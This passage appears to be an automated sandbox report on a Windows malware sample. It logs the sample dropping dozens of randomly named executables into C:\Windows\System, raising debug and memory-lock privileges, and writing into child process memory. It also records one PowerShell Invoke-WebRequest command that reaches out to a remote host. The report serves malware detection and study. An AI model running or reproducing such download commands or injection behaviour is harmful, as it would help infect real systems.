File created C:\Windows\System\shoVDFH.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\rRIehzD.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\popKYlb.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\naoMBCh.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\NWrngNK.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\tWPFmcs.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\TwFmidV.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\fpBRWjZ.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\vkgovFq.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\xtfYxYq.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\dNbpLxE.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\aUjtbEQ.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\eRcMCjk.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\ABNxquF.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\zluFNPp.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\oQocPYI.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\lYXRkKN.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\MdVLlVW.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\UfIOizs.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\OoPeUjg.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\HRZgkBY.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\gctKqfm.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\WlwaSWG.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\hAWQLDL.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\KPiYqFP.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\VLYLEsX.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\uhPxxiD.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\gVGsrVD.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\usJHlqe.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\LdDvzLD.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\AIcjWBk.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\TnvZbvF.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\RypsjLw.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\AjEOaLG.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\uXvrYPM.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\nYcchuU.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\OrgcCXQ.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\NlnCPar.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\fCNEnWW.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\soJCLYC.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\gBEHtYF.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\bTSwnTS.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\rLcaWxv.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\nfBEFEB.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\ONOejAS.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\KNgOkNY.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
File created C:\Windows\System\PcPaVyj.exe C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 704 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 704 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 704 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\tCGWtrx.exe
PID 704 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\tCGWtrx.exe
PID 704 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\KtUVqDC.exe
PID 704 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\KtUVqDC.exe
PID 704 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\qYLsnVI.exe
PID 704 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\qYLsnVI.exe
PID 704 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\PNSvijT.exe
PID 704 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\PNSvijT.exe
PID 704 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\HwmsqJj.exe
PID 704 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\HwmsqJj.exe
PID 704 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\SYkSVVz.exe
PID 704 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\SYkSVVz.exe
PID 704 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\zIyOHCJ.exe
PID 704 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\zIyOHCJ.exe
PID 704 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\Iqehtve.exe
PID 704 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\Iqehtve.exe
PID 704 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\QmRDgFX.exe
PID 704 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\QmRDgFX.exe
PID 704 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\KAGpeQT.exe
PID 704 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\KAGpeQT.exe
PID 704 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\iahHWaR.exe
PID 704 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\iahHWaR.exe
PID 704 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\CrZtOAh.exe
PID 704 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\CrZtOAh.exe
PID 704 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\RBWdFQz.exe
PID 704 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\RBWdFQz.exe
PID 704 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\cvGtMYy.exe
PID 704 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\cvGtMYy.exe
PID 704 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\maMhBoL.exe
PID 704 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\maMhBoL.exe
PID 704 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\yzeNtes.exe
PID 704 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\yzeNtes.exe
PID 704 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\FtQYuYf.exe
PID 704 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\FtQYuYf.exe
PID 704 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\PlCZsDB.exe
PID 704 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\PlCZsDB.exe
PID 704 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\KpHveNn.exe
PID 704 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\KpHveNn.exe
PID 704 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\AorfjIr.exe
PID 704 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\AorfjIr.exe
PID 704 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\ijlmOHf.exe
PID 704 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\ijlmOHf.exe
PID 704 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\axsnuIh.exe
PID 704 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\axsnuIh.exe
PID 704 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\UaZOuXE.exe
PID 704 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\UaZOuXE.exe
PID 704 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\VtRMRez.exe
PID 704 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\VtRMRez.exe
PID 704 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\YAEyqJg.exe
PID 704 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\YAEyqJg.exe
PID 704 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\kADKegI.exe
PID 704 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\kADKegI.exe
PID 704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\PcPaVyj.exe
PID 704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\PcPaVyj.exe
PID 704 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\OVzTxya.exe
PID 704 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\OVzTxya.exe
PID 704 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\qkwCFxX.exe
PID 704 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\qkwCFxX.exe
PID 704 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\SeODjOb.exe
PID 704 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\SeODjOb.exe
PID 704 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\UdnlBmh.exe
PID 704 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\UdnlBmh.exe

Processes

C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\tCGWtrx.exe

C:\Windows\System\tCGWtrx.exe

C:\Windows\System\KtUVqDC.exe

C:\Windows\System\KtUVqDC.exe

C:\Windows\System\qYLsnVI.exe

C:\Windows\System\qYLsnVI.exe

C:\Windows\System\PNSvijT.exe

C:\Windows\System\PNSvijT.exe

C:\Windows\System\HwmsqJj.exe

C:\Windows\System\HwmsqJj.exe

C:\Windows\System\SYkSVVz.exe

C:\Windows\System\SYkSVVz.exe

C:\Windows\System\zIyOHCJ.exe

C:\Windows\System\zIyOHCJ.exe

C:\Windows\System\Iqehtve.exe

C:\Windows\System\Iqehtve.exe

C:\Windows\System\QmRDgFX.exe

C:\Windows\System\QmRDgFX.exe

C:\Windows\System\KAGpeQT.exe

C:\Windows\System\KAGpeQT.exe

C:\Windows\System\iahHWaR.exe

C:\Windows\System\iahHWaR.exe

C:\Windows\System\CrZtOAh.exe

C:\Windows\System\CrZtOAh.exe

C:\Windows\System\RBWdFQz.exe

C:\Windows\System\RBWdFQz.exe

C:\Windows\System\cvGtMYy.exe

C:\Windows\System\cvGtMYy.exe

C:\Windows\System\maMhBoL.exe

C:\Windows\System\maMhBoL.exe

C:\Windows\System\yzeNtes.exe

C:\Windows\System\yzeNtes.exe

C:\Windows\System\FtQYuYf.exe

C:\Windows\System\FtQYuYf.exe

C:\Windows\System\PlCZsDB.exe

C:\Windows\System\PlCZsDB.exe

C:\Windows\System\KpHveNn.exe

C:\Windows\System\KpHveNn.exe

C:\Windows\System\AorfjIr.exe

C:\Windows\System\AorfjIr.exe

C:\Windows\System\ijlmOHf.exe

C:\Windows\System\ijlmOHf.exe

C:\Windows\System\axsnuIh.exe

C:\Windows\System\axsnuIh.exe

C:\Windows\System\UaZOuXE.exe

C:\Windows\System\UaZOuXE.exe

C:\Windows\System\VtRMRez.exe

C:\Windows\System\VtRMRez.exe

C:\Windows\System\YAEyqJg.exe

C:\Windows\System\YAEyqJg.exe

C:\Windows\System\kADKegI.exe

C:\Windows\System\kADKegI.exe

C:\Windows\System\PcPaVyj.exe

C:\Windows\System\PcPaVyj.exe

C:\Windows\System\OVzTxya.exe

C:\Windows\System\OVzTxya.exe

C:\Windows\System\qkwCFxX.exe

C:\Windows\System\qkwCFxX.exe

C:\Windows\System\SeODjOb.exe

C:\Windows\System\SeODjOb.exe

C:\Windows\System\UdnlBmh.exe

C:\Windows\System\UdnlBmh.exe

C:\Windows\System\UrKttdg.exe

C:\Windows\System\UrKttdg.exe

C:\Windows\System\qhKsvJo.exe

C:\Windows\System\qhKsvJo.exe

C:\Windows\System\ZiKCesX.exe

C:\Windows\System\ZiKCesX.exe

C:\Windows\System\SSavQZK.exe

C:\Windows\System\SSavQZK.exe

C:\Windows\System\OIJNfgK.exe

C:\Windows\System\OIJNfgK.exe

C:\Windows\System\pYfamYH.exe

C:\Windows\System\pYfamYH.exe

C:\Windows\System\rWTjeSp.exe

C:\Windows\System\rWTjeSp.exe

C:\Windows\System\jePaBuR.exe

C:\Windows\System\jePaBuR.exe

C:\Windows\System\LvNUadu.exe

C:\Windows\System\LvNUadu.exe

C:\Windows\System\NZlqyQC.exe

C:\Windows\System\NZlqyQC.exe

C:\Windows\System\RmVhEgn.exe

C:\Windows\System\RmVhEgn.exe

C:\Windows\System\vpXUlad.exe

C:\Windows\System\vpXUlad.exe

C:\Windows\System\KLDzAbz.exe

C:\Windows\System\KLDzAbz.exe

C:\Windows\System\TgWhyRr.exe

C:\Windows\System\TgWhyRr.exe

C:\Windows\System\lFUfkHJ.exe

C:\Windows\System\lFUfkHJ.exe

C:\Windows\System\YmPXJWy.exe

C:\Windows\System\YmPXJWy.exe

C:\Windows\System\WfZsRtX.exe

C:\Windows\System\WfZsRtX.exe

C:\Windows\System\zlifoFN.exe

C:\Windows\System\zlifoFN.exe

C:\Windows\System\vOXoAVH.exe

C:\Windows\System\vOXoAVH.exe

C:\Windows\System\kDKVkyX.exe

C:\Windows\System\kDKVkyX.exe

C:\Windows\System\hWyoqVO.exe

C:\Windows\System\hWyoqVO.exe

C:\Windows\System\MwZbtlX.exe

C:\Windows\System\MwZbtlX.exe

C:\Windows\System\XHlwLUb.exe

C:\Windows\System\XHlwLUb.exe

C:\Windows\System\NkRmZMR.exe

C:\Windows\System\NkRmZMR.exe

C:\Windows\System\zpPlell.exe

C:\Windows\System\zpPlell.exe

C:\Windows\System\BTYCazR.exe

C:\Windows\System\BTYCazR.exe

C:\Windows\System\CdwoOiQ.exe

C:\Windows\System\CdwoOiQ.exe

C:\Windows\System\zLLdqrT.exe

C:\Windows\System\zLLdqrT.exe

C:\Windows\System\qSiDpAG.exe

C:\Windows\System\qSiDpAG.exe

C:\Windows\System\cpabajI.exe

C:\Windows\System\cpabajI.exe

C:\Windows\System\wvPYvLa.exe

C:\Windows\System\wvPYvLa.exe

C:\Windows\System\TgNQFzo.exe

C:\Windows\System\TgNQFzo.exe

C:\Windows\System\AnIWAfI.exe

C:\Windows\System\AnIWAfI.exe

C:\Windows\System\fHfFOim.exe

C:\Windows\System\fHfFOim.exe

C:\Windows\System\lHxMPoH.exe

C:\Windows\System\lHxMPoH.exe

C:\Windows\System\nuMehfT.exe

C:\Windows\System\nuMehfT.exe

C:\Windows\System\cKFeqAM.exe

C:\Windows\System\cKFeqAM.exe

C:\Windows\System\MWrypiQ.exe

C:\Windows\System\MWrypiQ.exe

C:\Windows\System\uGjjkTk.exe

C:\Windows\System\uGjjkTk.exe

C:\Windows\System\YSAtgnt.exe

C:\Windows\System\YSAtgnt.exe

C:\Windows\System\VRZqhwI.exe

C:\Windows\System\VRZqhwI.exe

C:\Windows\System\zezYXaq.exe

C:\Windows\System\zezYXaq.exe

C:\Windows\System\fHJBsEj.exe

C:\Windows\System\fHJBsEj.exe

C:\Windows\System\IqAUbkf.exe

C:\Windows\System\IqAUbkf.exe

C:\Windows\System\AEFoXrc.exe

C:\Windows\System\AEFoXrc.exe

C:\Windows\System\jdBprsS.exe

C:\Windows\System\jdBprsS.exe

C:\Windows\System\teBBHic.exe

C:\Windows\System\teBBHic.exe

C:\Windows\System\DBCnstI.exe

C:\Windows\System\DBCnstI.exe

C:\Windows\System\KaZHzZf.exe

C:\Windows\System\KaZHzZf.exe

C:\Windows\System\vprsmzB.exe

C:\Windows\System\vprsmzB.exe

C:\Windows\System\qzbpHsp.exe

C:\Windows\System\qzbpHsp.exe

C:\Windows\System\tZAtXVI.exe

C:\Windows\System\tZAtXVI.exe

C:\Windows\System\Hnnuwrj.exe

C:\Windows\System\Hnnuwrj.exe

C:\Windows\System\tkHIdTD.exe

C:\Windows\System\tkHIdTD.exe

C:\Windows\System\eCdnbeb.exe

C:\Windows\System\eCdnbeb.exe

C:\Windows\System\qQjSGVe.exe

C:\Windows\System\qQjSGVe.exe

C:\Windows\System\MjRSjyJ.exe

C:\Windows\System\MjRSjyJ.exe

C:\Windows\System\lbRwQCl.exe

C:\Windows\System\lbRwQCl.exe

C:\Windows\System\gvgkehp.exe

C:\Windows\System\gvgkehp.exe

C:\Windows\System\BdkNotu.exe

C:\Windows\System\BdkNotu.exe

C:\Windows\System\CqDzNWz.exe

C:\Windows\System\CqDzNWz.exe

C:\Windows\System\WzHypqa.exe

C:\Windows\System\WzHypqa.exe

C:\Windows\System\gpYFxVX.exe

C:\Windows\System\gpYFxVX.exe

C:\Windows\System\eqcDfeT.exe

C:\Windows\System\eqcDfeT.exe

C:\Windows\System\ZkJiHfu.exe

C:\Windows\System\ZkJiHfu.exe

C:\Windows\System\TbSOrWp.exe

C:\Windows\System\TbSOrWp.exe

C:\Windows\System\wSnikrp.exe

C:\Windows\System\wSnikrp.exe

C:\Windows\System\rlXRKJi.exe

C:\Windows\System\rlXRKJi.exe

C:\Windows\System\ymPrDvb.exe

C:\Windows\System\ymPrDvb.exe

C:\Windows\System\YuPdslD.exe

C:\Windows\System\YuPdslD.exe

C:\Windows\System\VQxGEeO.exe

C:\Windows\System\VQxGEeO.exe

C:\Windows\System\pXeGDSv.exe

C:\Windows\System\pXeGDSv.exe

C:\Windows\System\fcwNvUC.exe

C:\Windows\System\fcwNvUC.exe

C:\Windows\System\FekfuzD.exe

C:\Windows\System\FekfuzD.exe

C:\Windows\System\DIOPdwH.exe

C:\Windows\System\DIOPdwH.exe

C:\Windows\System\qxUilYW.exe

C:\Windows\System\qxUilYW.exe

